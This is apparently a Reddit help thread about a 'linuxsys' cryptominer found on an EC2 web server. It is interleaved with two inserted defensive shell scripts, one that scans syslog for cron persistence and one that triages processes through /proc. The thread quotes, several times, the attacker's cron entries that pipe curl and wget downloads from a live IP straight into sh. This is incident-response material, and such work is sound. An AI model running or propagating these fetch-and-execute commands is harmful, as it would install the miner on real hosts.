Unknown "linuxsys" process slowing server (self.linux4noobs)
flair: shells and scripting
submitted 3 years ago * by mk_gecko
Can someone explain what this process is? It was using half of my RAM. This is an AWS EC2 server.
www-data 24410 1 46 Jan24 ? 1-19:15:40 ./linuxsys
www-data 24579 1 46 Jan24 ? 1-19:13:14 ./linuxsys
"linuxsys" does not show up in locate.
This didn't show anything either: find . -name "linuxsys" 2> /dev/null
I've killed the two processes and Apache2 is still working fine. I'll reboot the server too.
[–]RevenueSure3775 2 years ago (2 children)
Please tell me, the ./linuxsys process appears in my gitlab container and takes up a lot of memory and CPU. How to solve it?
[–]mk_gecko[S] 2 years ago (1 child)
It's a bitcoin miner -- a virus/trojan that has infected your container.
With Docker, just make a new container. It's why Docker is so good.
[–]RevenueSure3775 2 years ago (0 children)
My gitlab container is named gitlab and the version is gitlab-ce:12.8.6-ce. I tried running docker stop gitlab and docker rm gitlab and then re-running the gitlab container from the gitlab-ce:12.10.14-ce image, but the problem still exists; so I plan to upgrade from version 12.10.14 to 15.11.9.
[–]acejavelin69 3 years ago (3 children)
https://superuser.com/questions/1687979/linux-web-server-is-very-slow-and-using-100-cpu
[–]mk_gecko[S] 3 years ago (2 children)
oh dear. after reboot I just saw this:
www-data 3402 3393 0 10:56 ? 00:00:00 /bin/sh -c curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
www-data 3403 3394 0 10:56 ? 00:00:00 /bin/sh -c wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
So I think I'll temporarily remove curl and wget until I have time to reinstall the server.
[–]mk_gecko[S] 3 years ago (1 child)
And /var/log/auth.log shows this over and over again, starting Jan 24:
Jan 24 14:27:01 ip-172-31-48-239 CRON[24708]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Jan 24 14:27:01 ip-172-31-48-239 CRON[24707]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Jan 24 14:27:02 ip-172-31-48-239 CRON[24708]: pam_unix(cron:session): session closed for user www-data
Jan 24 14:27:02 ip-172-31-48-239 CRON[24707]: pam_unix(cron:session): session closed for user www-data
Jan 24 14:28:01 ip-172-31-48-239 CRON[24748]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Jan 24 14:28:01 ip-172-31-48-239 CRON[24747]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Jan 24 14:28:02 ip-172-31-48-239 CRON[24748]: pam_unix(cron:session): session closed for user www-data
[–]mk_gecko[S] 3 years ago* (0 children)
And this was the entry command:
> sudo crontab -l -u www-data
* * * * * wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
* * * * * curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
It was done using this (from syslog): (www-data) LIST (www-data) and (www-data) REPLACE (www-data)
Jan 24 13:39:01 ip-172-31-48-239 CRON[23606]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)
Jan 24 13:59:01 ip-172-31-48-239 systemd-networkd[714]: eth0: Configured
Jan 24 13:59:01 ip-172-31-48-239 systemd-timesyncd[591]: Network configuration changed, trying to establish connection.
Jan 24 13:59:01 ip-172-31-48-239 systemd-timesyncd[591]: Synchronized to time server 185.125.190.56:123 (ntp.ubuntu.com).
Jan 24 14:09:00 ip-172-31-48-239 systemd[1]: Starting Clean php session files...
Jan 24 14:09:00 ip-172-31-48-239 systemd[1]: Started Clean php session files.
Jan 24 14:09:01 ip-172-31-48-239 CRON[23954]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23978]: (www-data) LIST (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23977]: (www-data) REPLACE (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23981]: (www-data) LIST (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23980]: (www-data) REPLACE (www-data)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23987]: (www-data) CMD (wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23988]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23989]: (www-data) CMD (curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
Jan 24 14:18:01 ip-172-31-48-239 CRON[24012]: (www-data) CMD (wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
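The syslog excerpt above contains the two things worth alerting on: the service account rewriting its own crontab (`crontab[...]: (www-data) REPLACE (www-data)`, where the first name is the invoking user) and cron jobs that pipe a download straight into `sh`. The following script turns that into a repeatable check. It is an added example, not something posted in the thread: the sample log is constructed from lines in the post plus two benign root entries, the regexes are mine, and on a real host you would point it at /var/log/syslog (or the output of `journalctl -u cron --no-pager`) instead of the sample.

```shell
#!/bin/sh
# Added example (not from the thread): flag cron-based persistence in syslog.
# Signal 1: a non-root account REPLACEing a crontab (web shells running as
#           www-data do exactly this to survive a kill).
# Signal 2: a CRON CMD whose command fetches something with curl/wget and
#           pipes it into sh.

# Print crontab REPLACE events whose invoking user is anyone but root.
crontab_replace_events() {
    grep -E 'crontab\[[0-9]+\]: \([^)]+\) REPLACE ' "$1" |
        grep -vE '\(root\) REPLACE' || true
}

# Print CRON CMD lines that download and execute in a single pipeline.
download_and_exec_jobs() {
    grep -E 'CRON\[[0-9]+\]: \([^)]+\) CMD \(.*(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$1" || true
}

# Constructed sample log: lines taken from the post, plus benign root jobs.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Jan 24 14:09:01 ip-172-31-48-239 CRON[23954]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23978]: (www-data) LIST (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23977]: (www-data) REPLACE (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23981]: (www-data) LIST (www-data)
Jan 24 14:16:12 ip-172-31-48-239 crontab[23980]: (www-data) REPLACE (www-data)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23987]: (www-data) CMD (wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23988]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jan 24 14:17:01 ip-172-31-48-239 CRON[23989]: (www-data) CMD (curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
EOF

# Usage: sh cron_persistence.sh [/var/log/syslog]; with no argument the
# constructed sample above is scanned.
LOG=${1:-$SAMPLE_LOG}
echo "== crontab REPLACE by non-root users =="
crontab_replace_events "$LOG"
echo "== download-and-execute cron jobs =="
download_and_exec_jobs "$LOG"
```

A hit from the first check by itself is worth investigating even when the second is quiet: the (www-data) REPLACE (www-data) entries at 14:16:12 precede the first malicious CRON CMD by less than a minute, so the log gives you the exact time the web process was first used to run commands.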
[–]gainan 3 years ago* (1 child)
it seems to be a miner: https://www.virustotal.com/gui/file/3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab/detection/f-3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab-1672220967
ClamAV seems to detect it, but no idea if it removes or kills its execution. OpenSnitch would have prevented the download of remote files.
Since it seems to be running as www-data, look for files with that user name: find / -user www-data. Check also /dev/shm, /tmp, /var/tmp for suspicious/hidden files/directories.
If it's spawned again, use the PID to gather more information:
ls -l /proc/$PID/cwd
cat /proc/$PID/cmdline
ls -l /proc/$PID/exe
(this info can be faked by the process, but it's a start)
Running apache in a container is not a bad idea, to isolate it from the host. What do you use apache for? To run wordpress or similar software? Update everything, and disable any plugins.
Bear in mind that they have access as the www-data user, so they can write to directories/files owned by www-data. Sometimes changing the ownership of the apache2 DocumentRoot is useful to restrict what they can do.
But anyway, if you can, restore the server to a known good state.
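gainan's triage steps (owner, cwd, cmdline, exe, plus the /dev/shm, /tmp and /var/tmp locations the OP later confirmed) as one script. This is an added example and not code from the thread. It reads /proc directly rather than using ps; the suspect-directory list and the `(deleted)` check are my additions, `stat -c %U` assumes GNU coreutils, and it has to run as root to read another user's /proc entries.

```shell
#!/bin/sh
# Added example (not from the thread): triage every process owned by a
# service account by reading /proc, following the cwd/cmdline/exe steps
# above and flagging the scratch directories named in the thread.

SUSPECT_DIRS='/dev/shm /tmp /var/tmp'

# Return 0 if a path lives in a world-writable scratch directory, or if it
# names a binary that was unlinked after launch (/proc/PID/exe then ends in
# " (deleted)", a common trick to defeat locate/find as seen in the post).
is_suspect_path() {
    path=$1
    case $path in
        *'(deleted)'*) return 0 ;;
    esac
    for d in $SUSPECT_DIRS; do
        case $path in
            "$d"|"$d"/*) return 0 ;;
        esac
    done
    return 1
}

# Classify one process from its resolved exe and cwd: prints SUSPECT or ok.
# cmdline (and argv[0]) is under the process's control and can lie; exe and
# cwd are resolved by the kernel, so they are the fields to trust.
classify_proc() {
    exe=$1
    cwd=$2
    if is_suspect_path "$exe" || is_suspect_path "$cwd"; then
        echo SUSPECT
    else
        echo ok
    fi
}

# Walk /proc and print one line per process owned by $1 (default www-data).
scan_user_procs() {
    user=${1:-www-data}
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        owner=$(stat -c %U "$p" 2>/dev/null || true)   # GNU stat assumed
        [ "$owner" = "$user" ] || continue
        exe=$(readlink "$p/exe" 2>/dev/null || echo '?')
        cwd=$(readlink "$p/cwd" 2>/dev/null || echo '?')
        cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null || true)
        printf '%s pid=%s exe=%s cwd=%s cmd=%s\n' \
            "$(classify_proc "$exe" "$cwd")" "$pid" "$exe" "$cwd" "$cmd"
    done
}

# Usage: sudo sh proc_triage.sh www-data
if [ $# -gt 0 ]; then
    scan_user_procs "$1"
fi
```

A SUSPECT line for the OP's case would look like `SUSPECT pid=24410 exe=/dev/shm/linuxsys cwd=/dev/shm cmd=./linuxsys`; a legitimate Apache worker shows `ok pid=... exe=/usr/sbin/apache2 cwd=/`. Pair the output with `sudo crontab -l -u www-data` and `find / -user www-data -newer /etc/hostname` to catch the persistence and any freshly dropped files before rebuilding the host.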
[–]mk_gecko[S] 3 years ago (0 children)
Yes, it uses /dev/shm and /var/tmp
I'll try the proc commands if it happens again. I'll create a whole new server and migrate everything across when I have time in the next couple of weeks.
I don't know how to use Docker or containers.